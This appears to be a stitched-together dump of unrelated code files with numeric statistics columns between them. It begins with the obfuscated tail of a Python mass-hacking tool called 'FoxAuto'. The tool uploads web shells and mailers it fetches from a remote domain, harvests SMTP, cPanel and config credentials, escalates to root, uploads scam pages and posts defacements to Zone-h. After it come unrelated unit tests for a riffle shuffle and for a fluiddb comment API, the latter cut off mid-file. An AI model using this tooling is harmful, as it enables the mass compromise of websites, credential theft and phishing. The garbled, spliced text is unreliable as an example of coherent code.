[((((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(____oumrhwochlkn+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+_____ofzwawhkpwlm+______hotkgbptqejb+(((_____ofzwawhkpwlm<<(_oaowtpxvobjz**_oaowtpxvobjz)))<<(_oaowtpxvobjz**_oaowtpxvobjz))),(___jalaznnmibpy+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+_____ofzwawhkpwlm+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb),((_oaowtpxvobjz**_oaowtpxvobjz)+___jalaznnmibpy+____oumrhwochlkn+(((__mdujlsfdmxmj<<___jalaznnmibpy))<<(_oaowtpxvobjz**_oaowtpxvobjz))+______hotkgbptqejb)])))
break
return ________________________sdjxilhjdjtv
except :
return ________________________sdjxilhjdjtv
def getFile(name, ty):
try:
def download_url(name, ty, chunk_size=128):
try:
r = requests.get('https://{}/_@files/{}/{}'.format(dom, ty, name), stream=True, headers=headers, timeout=180)
with open('Files/' + name, 'wb') as fd:
for chunk in r.iter_content(chunk_size=chunk_size):
fd.write(chunk)
return open('Files/' + name, 'rb')
except:
return False
def checkFile(name, ty):
try:
if(sys.version_info[0] < 3):
src = str(open('Files/' + name, 'rb').read())
else:
src = str(open('Files/' + name, 'rb').read().decode('cp866'))
if(ty == 'php' and ('FoxAuto' in src or 'tjwlltii' in src)): return True
elif(ty == 'zip_v6' and ('<title>Site Maintenance</title>' not in src and src != '')): return True
return False
except:
return False
newpath = r'Files'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
for dom in ____________gwbahwaesaqz :
if (ty == 1):
src = download_url(name, 'php')
if(src is False): continue
if(checkFile(name, 'php') is True): break
elif(ty == 2):
src = download_url(name, 'zip_v6')
if(src is False): continue
if(checkFile(name, 'zip_v6') is True): break
return src
except:
return False
def FoxAuto():
try :
main()
if(__________xrwpikstqlrz() is False): return
shellFox()
try:
sites = open(sys.argv[1], 'r')
except :
yList = str(input_Fox('\n Your List --> : '))
if (not os.path.isfile(yList)):
print("\n {}({}) File does not exist.\n".format(fr, yList))
return
sites = open(yList, 'r')
getToken = shell_Fox
print('\n {}If your list is {}Shells{}/{}UPloaders{} choose from 1-21 :'.format(fc, fg, fc, fg, fc))
print(' [01] {}Mass Reset Passowrd {}cPanel'.format(fw, fr))
print(' [02] {}Mass Finder SMTP {}+{} Create SMTP'.format(fw, fg, fw))
print(' [03] {}Mass Finder {}Linux{}/{}Windows{}, {}cPanel{}/vHosts/Root {}[PWD|UNAME]'.format(fw, fg, fw, fr, fw, fr, fw, fr))
print(" [04] {}Mass Finder Accesshash {}Reseller {}+{} .my.cnf {}cPanel {}[DEV]".format(fw, fr, fg, fw, fr, fg))
print(" [05] {}Mass Get Config ({}cPanel{}/vHosts) server {}+{} Config{}404 {}+{} Config{}CFS".format(fw, fr, fw, fg, fw, fr, fg, fw, fg))
print(" [06] {}Mass Get Config {}+ {}Crack {}cPanel{}/{}WHM {}[DEV]".format(fw, fg, fw, fr, fw, fc, fg))
print(' [07] {}Mass Get Config {}+{} Upload Shell on {}WordPress{}/{}Joomla{}/{}Opencart {}[DEV]'.format(fw, fg, fw, fg, fw, fr, fw, fc, fg))
print(' [08] {}Mass Get {}Root{} by {}./dirty [PHP/BASH]'.format(fw, fg, fw, fr))
print(' [09] {}Mass Get {}RDP{} from {}Windows {}server'.format(fw, fg, fw, fr, fw))
print(" [10] {}Mass Get Domains-List".format(fw))
print(" [11] {}Mass Get Emails-List".format(fw))
print(" [12] {}Mass Get Config {}+ {}Emails-List".format(fw, fg, fw))
print(' [13] {}Mass Upload Mailer {}[Random]'.format(fw, fr))
print(' [14] {}Mass Upload File {}[Random]'.format(fw, fr))
print(' [15] {}Mass Upload Index {}+{} Post in {}Zone-h {}[DEV]'.format(fw, fg, fw, fr, fg))
print(' [16] {}Mass Upload {}Scam-Page{}/{}Zip-file {}+{} UNZip'.format(fw, fg, fw, fr, fg, fw))
print(" [17] {}Mass Chack if Sending mail is Working or not! {}[Results delivery]".format(fw, fr))
print(' [18] {}Mass Reports replacement {}Olux{}/{}xLeet{}/{}Other'.format(fw, fg, fw, fr, fw, fc))
print(" {}[{}19{}] {}From any{} Shell/UPloader, MASS Upload File {}Shell{}/{}Mailer {}[DEV]".format(fw, fg, fw, fg, fw, fg, fw, fr, fg))
print(' [20] {}Reset Passowrd {}cPanel {}+{} Finder/Create SMTP {}[together]'.format(fw, fr, fg, fw, fr))
print(' [21] {}01 {}+{} 02 {}+{} 04 {}+{} 06 {}+{} 08 {}[All of them together]'.format(fw, fg, fw, fg, fw, fg, fw, fg, fw, fr))
time.sleep(1.5)
print('\n {}elseif your list is {}cPanels{} choose from 22-26 :'.format(fc, fr, fc))
print(' [22] {}Mass Finder SMTP {}+{} Create SMTP'.format(fw, fg, fw))
print(" [23] {}MASS Upload File {}Olux{}/{}xLeet{}/{}Other{} Shell/Mailer".format(fw, fg, fw, fr, fw, fc, fw))
print(' [24] {}Mass Upload {}Scam-Page{}/{}Zip-file {}+{} UNZip'.format(fw, fg, fw, fr, fg, fw))
print(" [25] {}Mass Chack if Sending mail is Working or not! {}[Results delivery]".format(fw, fr))
print(' [26] {}Mass Reports replacement {}Olux{}/{}xLeet{}/{}Other'.format(fw, fg, fw, fr, fw, fc))
time.sleep(1.5)
print('\n {}elseif your list is {}Wordpress{}/{}Joomla{}/{}Opencart{}/{}Drupal{} panels choose 27 :'.format(fc, fg, fc, fr, fw, fc, fw, fr, fc))
print(" [27] {}Mass login {}Wordpress{}/{}Joomla{}/{}Opencart{}/{}Drupal{} panel {}+{} UPload Shell".format(fw, fg, fw, fr, fw, fc, fw, fr, fw, fg, fw))
time.sleep(1.5)
print('\n {}else :'.format(fc))
print(" [28] {}Explanation ({}YouTube{}) {}|| {}Request more {}features{} and {}tools".format(fw, fr, fw, fr, fw, fg, fw ,fg))
print(" [29] {}About Script {}&{} Check Update".format(fg, fr, fg))
print(" {}[{}00{}] {}Exit".format(fw, fr, fw, fr))
try :
w = int(input_Fox('\n --> : '))
except:
print("\n {}Choose from 0-29, please.\n".format(fr))
return
print('')
cia = getToken
if (w == 0) :
print(" {}Go to hell :P.\n".format(fr))
return
if (w > 29) :
print("\n {}Choose from 0-29, please.\n".format(fr))
return
if (w == 29) :
about()
return
if (w == 28) :
Request()
return
newpath = r'Results'
if (not os.path.exists(newpath)):
os.makedirs(newpath)
if (w == 1):
print(' {}[{}?{}] {}Choose the procedure that suits you.\n'.format(fw, fr, fw, fc))
print(' [1] {}Automatic {}[Default]'.format(fw, fg))
print(' [2] {}Semi-Automatic'.format(fw))
try:
tyRest = int(input_Fox('\n --> : '))
except:
tyRest = 1
print('')
if (tyRest != 1 and tyRest != 2):
tyRest = 1
elif (tyRest == 2):
email = str(input_Fox(' Your Email --> : '))
print('')
if (w == 18 or w == 26):
print(' {}[{}?{}] {}Choose the procedure that suits you.\n'.format(fw, fr, fw, fc))
print(' [1] {}Automatic {}[With Proofs]'.format(fw, fg))
print(' [2] {}Semi-Automatic {}[Just Form]'.format(fw, fr))
try:
tyReport = int(input_Fox('\n --> : '))
except:
tyReport = 1
print('')
getFile('unzipper.txt', 1)
if (tyReport != 1 and tyReport != 2):
tyReport = 1
elif (tyReport == 2):
email = str(input_Fox(' Your Email --> : '))
print('')
q = str(input_Fox(' {}[{}?{}] {}Do you want Hidden uploader (?Ghost=send) in test.php ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg,fw, fr, fw)))
print('')
global testSend
if (q.lower() == 'y' or q.lower() == 'yes'):
testSend = testSendB
else :
testSend = testSendA
if (w == 13) :
q = str(input_Fox(' {}[{}?{}]{} Do you want the encrypted version of Leaf PHPMailer ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no') :
q = 0
else :
q = 1
if (q == 0) :
srcMailer = 'Files/leafmailer2.8.txt'; getFile('leafmailer2.8.txt', 1)
elif (q == 1):
srcMailer = 'Files/leafmailer2.8-encode.txt'; getFile('leafmailer2.8-encode.txt', 1)
print('')
if (w == 15) :
nameF = str(input_Fox(' Your Index\'s name --> : '))
if (not os.path.isfile(nameF)):
print("\n {}({}) File does not exist.\n".format(fr, nameF))
return
fileSrc = nameF
print('\n {}[{}?{}] {}Choose what you want.\n'.format(fw, fr, fw, fc))
print(' [1] {}Index with the same name, like => {}http://domain.com/{}'.format(fw, fr, nameF))
print(' [2] {}Index in the main index, like => {}http://domain.com/'.format(fw, fr))
try :
tyUP = int(input_Fox('\n --> : '))
except:
tyUP = 1
if (tyUP != 1 and tyUP != 2) :
tyUP = 1
q = str(input_Fox('\n {}[{}?{}]{} Do you want post in Zone-h ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no'):
q = 0
nameA = ''
else:
q = 1;requests.get('http://www.zone-h.org/notify/single', headers=headers, verify=False, timeout=30)
nameA = str(input_Fox('\n Attacker name --> : '))
print('')
if (w == 19 or w == 23 or w == 14 or w == 7 or w == 27) :
print(' {}[{}?{}] {}Choose what you want to upload it.\n'.format(fw, fr, fw, fc))
print(' [1] {}Fox WSO {}[It is accepted in all sites-Shop]'.format(fw, fg))
print(' [2] {}OLux Shell'.format(fw))
print(' [3] {}xLeet Shell'.format(fw))
print(' [4] {}Leaf PHPMailer'.format(fw))
print(' [5] {}Other file'.format(fr))
try :
tyShell = int(input_Fox('\n --> : '))
except:
print("\n {}Choose from 1-5, please.\n".format(fr))
return
if (tyShell == 4):
q = str(input_Fox('\n {}[{}?{}]{} Do you want the encrypted version of Leaf PHPMailer ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
if (q.lower() == 'n' or q.lower() == 'no') :
q = 0
else:
q = 1
if (tyShell == 1) :
srcShell = 'Files/FoxWSO-full.txt'; getFile('FoxWSO-full.txt', 1)
elif (tyShell == 2) :
srcShell = 'Files/olux-shell.txt'; getFile('olux-shell.txt', 1)
elif (tyShell == 3) :
srcShell = 'Files/xleet-shell.txt'; getFile('xleet-shell.txt', 1)
elif (tyShell == 4 and q == 0) :
srcShell = 'Files/leafmailer2.8.txt'; getFile('leafmailer2.8.txt', 1)
elif (tyShell == 4 and q == 1):
srcShell = 'Files/leafmailer2.8-encode.txt'; getFile('leafmailer2.8-encode.txt', 1)
elif (tyShell == 5) :
nameF = str(input_Fox('\n Your File\'s name --> : '))
if (not os.path.isfile(nameF)):
print("\n {}({}) File does not exist.\n".format(fr, nameF))
return
srcShell = nameF
else:
print("\n {}Choose from 1-5, please.\n".format(fr))
return
if (w == 14 or w == 19):
print('\n {}[{}?{}] {}Choose where do you want upload it.\n'.format(fw, fr, fw, fc))
print(' [1] {}In the same path {}[Default]'.format(fw, fg))
print(' [2] {}In the main path'.format(fw))
try :
tyUP = int(input_Fox('\n --> : '))
except:
tyUP = 1
if (tyUP != 1 and tyUP != 2) :
tyUP = 1
if (w == 7 or w == 27):
q = str(input_Fox('\n {}[{}?{}] {}Do you want to get (cPanel/SMTP) ? {}[{}Y{}/{}N{}] : '.format(fw, fr, fw, fc, fw, fg, fw, fr, fw)))
print('')
run()
if (w == 19) :
for site in sites:
try:
url = site.strip()
print(' --| {}{}'.format(fc, url))
newBackdor = uploadFile_ALL(url)
if (newBackdor is False) :
print('')
continue
else :
newBackdor = check(newBackdor)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newBackdor, dom))
if (tyUP == 1) :
uploadFile(newBackdor, srcShell, tyShell)
elif (tyUP == 2) :
uploadFileMain(newBackdor, srcShell, tyShell)
print('')
except:
print(' {}[-] Failed.\n'.format(fr))
return
if (w == 16):
filezip = str(input_Fox(' Your File\'s name (.zip) --> : '))
if (not os.path.isfile(filezip)):
print("\n {}({}) File does not exist.\n".format(fr, filezip))
return
print('')
if (w == 22 or w ==23 or w == 24 or w == 25 or w == 26) :
if (w == 24):
filezip = str(input_Fox(' Your File\'s name .zip --> : '))
if (not os.path.isfile(filezip)):
print("\n {}({}) File does not exist.\n".format(fr, filezip))
return
print('')
for site in sites:
try:
datacPanel = site.strip()
if (w == 22 or w ==23 or w == 24 or w ==25) :
cp = cPanel(datacPanel, up=1)
if (cp is False):
print('')
continue
else :
newBackdor = check(cp)
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(newBackdor, dom))
if (w == 22) :
finderSMTP(newBackdor)
getSMTP(newBackdor)
elif (w == 23):
uploadFile(newBackdor, srcShell, tyShell)
elif (w == 24) :
ZIP(newBackdor, filezip)
elif (w == 25) :
checkSend(newBackdor, datacPanel)
elif (w == 26) :
cp = cPanel(datacPanel)
if (cp is False):
print('')
continue
else :
cpL = datacPanel.split('|')
if (tyReport == 1):
ReportsCP_Auto(cpL[0], cpL[1], cpL[2], cp[1], cp[0], cp[2], cp[3])
elif (tyReport == 2):
ReportsCP_SemiAuto(cpL[0], cpL[1], cpL[2], cp[1], cp[0], cp[2], cp[3], email)
print('')
except:
print(' {}[-] Failed.\n'.format(fr))
return
t = 'resetpassword'
if (w == 27) :
logins = []
wp = 0
jm = 0
oc = 0
dp = 0
for site in sites:
panel = site.strip()
if (not re.findall(re.compile('http(.*)/(.*)#(.*)@(.*)'), panel)):
print(' {}[-] The list must be => {}http://domain.com/wp-login.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/administrator/index.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/admin/index.php#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
print(' {} OR {}http://domain.com/user/login#{}user{}@{}pass\n'.format(fr, fg, fr, fg, fr))
return
if ('/wp-login.php' in panel) :
wp = 1
logins.append(panel)
elif ('/administrator' in panel) :
jm = 1
logins.append(panel)
elif ('/admin' in panel) :
oc = 1
logins.append(panel)
elif ('/user' in panel) :
dp = 1
logins.append(panel)
shells = uploadShellbyPanels(logins, wp, jm, oc, dp, srcShell, tyShell)
if (q.lower() == 'y' or q.lower() == 'yes') :
if (shells is False) :
return
else :
for shell in shells :
try :
print(' --| {}{}'.format(fc, URL_FOX(shell)))
newShell = check(shell)
resetPassword(newShell, '{}?php={}/_@files/php/up.txt'.format(newShell, dom), t)
finderSMTP(newShell)
getSMTP(newShell)
except :
print(' {}[-] Failed.'.format(fr))
print('')
return
token = re.findall(re.compile('<token>(.*)</token>'), getToken)[0]
for site in sites :
try :
url = site.strip()
print(' --| {}{}'.format(fc, url))
shell_path = upload(url)
if(shell_path is False):
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url))
continue
elif('FoxAuto' in shell_Fox and 'hexdec' in cia and len(token) == 9):
shell_path = check(shell_path)
print(' {}[+] Shell is Working.'.format(fg))
open('Results/backdors.txt', 'a').write('{}?php={}/_@files/php/up.txt\n'.format(shell_path, dom))
if (w == 1) :
if (tyRest == 1):
resetPassword(shell_path, url, t)
elif (tyRest == 2):
resetPassword2(shell_path, url, email)
elif (w == 2) :
finderSMTP(shell_path)
getSMTP(shell_path)
elif (w == 3) :
finderScript(shell_path, url)
elif (w == 4) :
accesshash(shell_path, url)
elif (w == 5) :
getConfig(shell_path, url)
elif (w == 6) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
getConfigPasswords_cPanelcracker(shell_path, config)
elif (w == 7) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
logins = ChangePanel(shell_path, config)
if (logins is False):
print('')
continue
else :
shells = uploadShellbyPanels(logins[0], logins[1], logins[2], logins[3], 0, srcShell, tyShell)
if (q.lower() == 'y' or q.lower() == 'yes') :
if (shells is False):
print('')
continue
else :
for shell in shells:
try :
print(' --| {}{}'.format(fc, URL_FOX(shell)))
newShell = check(shell)
resetPassword(newShell, '{}?php={}/_@files/php/up.txt'.format(newShell, dom), t)
finderSMTP(newShell)
getSMTP(newShell)
except :
print(' {}[-] Failed.'.format(fr))
print('')
elif (w == 8) :
getRoot(shell_path, url)
elif (w == 9) :
getRDP(shell_path, url)
elif (w == 10) :
getDomains(shell_path)
elif (w == 11) :
getMails(shell_path)
elif (w == 12) :
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
MassGetMails(shell_path, config)
elif (w == 13) :
uploadMailer(shell_path, srcMailer)
elif (w == 14) :
if (tyUP == 1):
uploadFile(shell_path, srcShell, tyShell + 5)
elif (tyUP == 2):
uploadFileMain(shell_path, srcShell, tyShell + 5)
elif (w == 15):
if (tyUP == 1):
massUploadIndex1(shell_path, fileSrc, nameF, q, nameA)
elif (tyUP == 2):
massUploadIndex2(shell_path, fileSrc, q, nameA)
elif (w == 16) :
ZIP(shell_path, filezip)
elif (w == 17) :
checkSend(shell_path, url)
elif (w == 18) :
if (tyReport == 1):
ReportsShell_Auto(shell_path, url)
elif (tyReport == 2):
ReportsShell_SemiAuto(shell_path, url, email)
elif (w == 20) :
resetPassword(shell_path, url, t)
finderSMTP(shell_path)
getSMTP(shell_path)
elif (w == 21) :
resetPassword(shell_path, url, t)
finderSMTP(shell_path)
getSMTP(shell_path)
accesshash(shell_path, url)
getRoot(shell_path, url)
config = getConfig(shell_path, url)
if (config is False):
print('')
continue
else :
getConfigPasswords_cPanelcracker(shell_path, config)
print('')
else :
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url))
except :
print(' {}[-] Shell not Working OR Upload failed.\n'.format(fr))
open('Results/bad.txt', 'a').write('{}\n'.format(url.strip()))
except :
pass
FoxAuto()
input_Fox(' {}[{}!{}] {}Press Enter to exit '.format(fw, fr, fw, fc))
| 93.566038
| 32,310
| 0.703812
| 31,356
| 317,376
| 6.380214
| 0.040024
| 0.190385
| 0.180308
| 0.159794
| 0.883224
| 0.865059
| 0.851713
| 0.835333
| 0.816783
| 0.803312
| 0
| 0.00965
| 0.100748
| 317,376
| 3,392
| 32,311
| 93.566038
| 0.691322
| 0.003019
| 0
| 0.600794
| 0
| 0.127062
| 0.17387
| 0.053253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025657
| false
| 0.049481
| 0.004582
| 0
| 0.081246
| 0.114844
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d5473f62d44ca968e023b3af75a60a54bc3c1b92
| 2,206
|
py
|
Python
|
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
problems/test_ic_36_single_riffle_shuffle.py
|
gregdferrell/algo
|
974ae25b028d49bcb7ded6655a7e11dcf6aa221d
|
[
"MIT"
] | null | null | null |
from .ic_36_single_riffle_shuffle import single_riffle_shuffle_1
def test_single_riffle_shuffle_1_empty_deck():
    """An empty shuffled deck can never be a riffle of two non-empty halves."""
    first, second = [1, 2, 3, 4, 5], [6, 7, 8, 9, 10]
    assert not single_riffle_shuffle_1([], first, second)
def test_single_riffle_shuffle_1_empty_half_1():
    """A non-empty deck is not a riffle when the first half is empty."""
    deck = list(range(1, 11))
    assert not single_riffle_shuffle_1(deck, [], [6, 7, 8, 9, 10])
def test_single_riffle_shuffle_1_empty_half_2():
    """A non-empty deck is not a riffle when the second half is empty."""
    deck = list(range(1, 11))
    assert not single_riffle_shuffle_1(deck, [1, 2, 3, 4, 5], [])
def test_single_riffle_shuffle_1_unequal_lengths():
    """Halves whose combined size differs from the deck's are rejected."""
    deck = list(range(1, 10))  # nine cards; halves total ten
    assert not single_riffle_shuffle_1(deck, [1, 2, 3, 4, 5], [6, 7, 8, 9, 10])
def test_single_riffle_shuffle_1_cut_the_deck():
    """Stacking one half directly on the other is a valid (degenerate) riffle."""
    deck = list(range(1, 11))
    assert single_riffle_shuffle_1(deck, deck[:5], deck[5:])
def test_single_riffle_shuffle_1_smallest_half():
    """A single-card half followed by the remainder is a valid riffle."""
    deck = list(range(1, 11))
    assert single_riffle_shuffle_1(deck, deck[:1], deck[1:])
def test_single_riffle_shuffle_1_beauty_shuffle():
    """A perfect alternation of odd and even cards is a valid riffle."""
    deck = list(range(1, 11))
    odds = [card for card in deck if card % 2]
    evens = [card for card in deck if not card % 2]
    assert single_riffle_shuffle_1(deck, odds, evens)
def test_single_riffle_shuffle_1_good_shuffle():
    """An ordinary interleaving with uneven runs is a valid riffle."""
    deck = list(range(1, 11))
    assert single_riffle_shuffle_1(deck, [1, 2, 5, 6, 9, 10], [3, 4, 7, 8])
def test_single_riffle_shuffle_1_barely_off_1():
    """Swapping just two cards within one half invalidates the riffle."""
    deck = list(range(1, 11))
    assert not single_riffle_shuffle_1(deck, [1, 2, 5, 6, 10, 9], [3, 4, 7, 8])
def test_single_riffle_shuffle_1_different_card():
    """A half containing a card that is not in the deck is rejected."""
    deck = list(range(1, 11))
    assert not single_riffle_shuffle_1(deck, [1, 2, 4, 11, 7, 8, 10], [3, 6, 9])
| 26.902439
| 66
| 0.68495
| 450
| 2,206
| 3
| 0.082222
| 0.195556
| 0.30963
| 0.311111
| 0.868889
| 0.868889
| 0.868889
| 0.831852
| 0.831852
| 0.828889
| 0
| 0.144189
| 0.173164
| 2,206
| 81
| 67
| 27.234568
| 0.595943
| 0
| 0
| 0.54902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.196078
| 1
| 0.196078
| false
| 0
| 0.019608
| 0
| 0.215686
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
634db61c4c5e6cfc7f0245df4c5b27cc9505949e
| 226
|
py
|
Python
|
bibcat/tests/__init__.py
|
KnowledgeLinks/bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 4
|
2018-02-13T20:36:29.000Z
|
2019-09-26T14:38:25.000Z
|
bibcat/tests/__init__.py
|
KnowledgeLinks/rdfw-bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 11
|
2017-10-27T17:44:46.000Z
|
2018-08-15T17:27:25.000Z
|
bibcat/tests/__init__.py
|
KnowledgeLinks/rdfw-bibcat
|
ed530401290865dcfefb2ae661a8880e52876a48
|
[
"MIT"
] | 1
|
2017-01-23T19:52:01.000Z
|
2017-01-23T19:52:01.000Z
|
import unittest
from linkers import *
from ingesters.test_oai_pmh import *
from ingesters.test_rels_ext import *
from rml.test_processor import *
from test_bibcat_funcs import *
# Run every test case pulled in by the wildcard imports above when this
# package is executed directly as a script.
if __name__ == '__main__':
    unittest.main()
| 22.6
| 37
| 0.787611
| 32
| 226
| 5.09375
| 0.53125
| 0.245399
| 0.233129
| 0.282209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141593
| 226
| 9
| 38
| 25.111111
| 0.840206
| 0
| 0
| 0
| 0
| 0
| 0.035398
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
639499b06f404fa4a27727e1aa7f4c7b192007d4
| 74,186
|
py
|
Python
|
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 3
|
2021-05-10T14:41:30.000Z
|
2021-12-16T05:53:30.000Z
|
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | null | null | null |
fluiddb/web/test/test_comment.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 2
|
2018-01-24T09:03:21.000Z
|
2021-06-25T08:34:54.000Z
|
from calendar import timegm
from datetime import datetime, timedelta
from json import dumps, loads
from time import time as get_time
from twisted.internet.defer import inlineCallbacks
from twisted.web.http import BAD_REQUEST, UNAUTHORIZED
from twisted.web.http_headers import Headers
from fluiddb.data.system import createSystemData
from fluiddb.model.user import UserAPI, getUser
from fluiddb.security.comment import SecureCommentAPI
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.doubles import FakeRequest
from fluiddb.testing.resources import (
CacheResource, ConfigResource, DatabaseResource, IndexResource,
LoggingResource, ThreadPoolResource)
from fluiddb.testing.session import login
from fluiddb.web.comment import CommentResource
from fluiddb.util.transact import Transact
from fluiddb.model.value import TagValueAPI
from fluiddb.model.object import ObjectAPI
class CommentResourceTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('client', IndexResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
    def setUp(self):
        """Create system data, two users, and a Transact for each test.

        Creates the C{username} and C{fluidinfo.com} users, stores the
        former as C{self.user}, and commits so the fixtures are visible to
        code running in other transactions.
        """
        super(CommentResourceTest, self).setUp()
        createSystemData()
        UserAPI().create([
            (u'username', u'password', u'User', u'user@example.com'),
            (u'fluidinfo.com', u'password', u'User', u'user@example.com')])
        self.user = getUser(u'username')
        self.transact = Transact(self.threadPool)
        self.store.commit()
    def invoke(self, method, _username=None, **kwargs):
        """Invoke a JSON-RPC method and return the result.

        @param method: The name of the JSON-RPC method to call.
        @param _username: Optionally, the username to make the call as.
            Defaults to C{u'username'}.
        @param kwargs: Keyword arguments passed through as the JSON-RPC
            C{params} mapping.
        @return: The deferred result of rendering the POST request against
            a L{CommentResource}.
        """
        username = _username or u'username'
        with login(username, self.user.objectID, self.transact) as session:
            # Build a JSON-RPC 2.0 request body with a fixed request id of
            # 100 (the tests assert on that id in the responses).
            body = dumps({'id': 100, 'jsonrpc': '2.0', 'method': method,
                          'params': kwargs})
            headers = Headers({'Content-Length': [str(len(body))],
                               'Content-Type': ['application/json']})
            request = FakeRequest(headers=headers, body=body)
            resource = CommentResource(None, session)
            return resource.deferred_render_POST(request)
@inlineCallbacks
def testAddComment(self):
"""
The C{addComment} method creates a comment and returns a C{dict} with
a mapping of tags to values that represent that comment.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool')
result = loads(result)
url = result['result']['fluidinfo.com/info/url']
urlFragment = 'https://fluidinfo.com/comment/fluidinfo.com/username/'
self.assertTrue(url.startswith(urlFragment))
isoTime = url[len(urlFragment):]
when = datetime.strptime(isoTime, '%Y-%m-%dT%H:%M:%S.%f')
timestamp = result['result']['fluidinfo.com/info/timestamp']
self.assertEqual(
timegm(when.utctimetuple()) + float(when.strftime('0.%f')),
timestamp)
self.assertEqual(
{'jsonrpc': u'2.0',
'id': 100,
'result': {
'fluidinfo.com/info/about': [
u'trout fishing in america', u'http://abc.com/def.html',
u'#super', u'#cool', u'@joe', u'@sam'],
'fluidinfo.com/info/text': (
u'@joe @sam http://abc.com/def.html is #super #cool'),
'fluidinfo.com/info/timestamp': timestamp,
'fluidinfo.com/info/url': url,
'fluidinfo.com/info/username': u'username'}},
result)
@inlineCallbacks
def testAddCommentWithCreationTime(self):
"""
The C{addComment} method optionally accepts a creation time to use
when creating the comment.
"""
result = yield self.invoke(
'addComment', about=u'trout fishing in america',
text='@joe @sam http://abc.com/def.html is #super #cool',
creationTime='2012-05-16T12:13:14.16253')
result = loads(result)
self.assertEqual(
{u'jsonrpc': u'2.0',
u'id': 100,
u'result': {
u'fluidinfo.com/info/about': [
u'trout fishing in america', u'http://abc.com/def.html',
u'#super', u'#cool', u'@joe', u'@sam'],
u'fluidinfo.com/info/text': (
u'@joe @sam http://abc.com/def.html is #super #cool'),
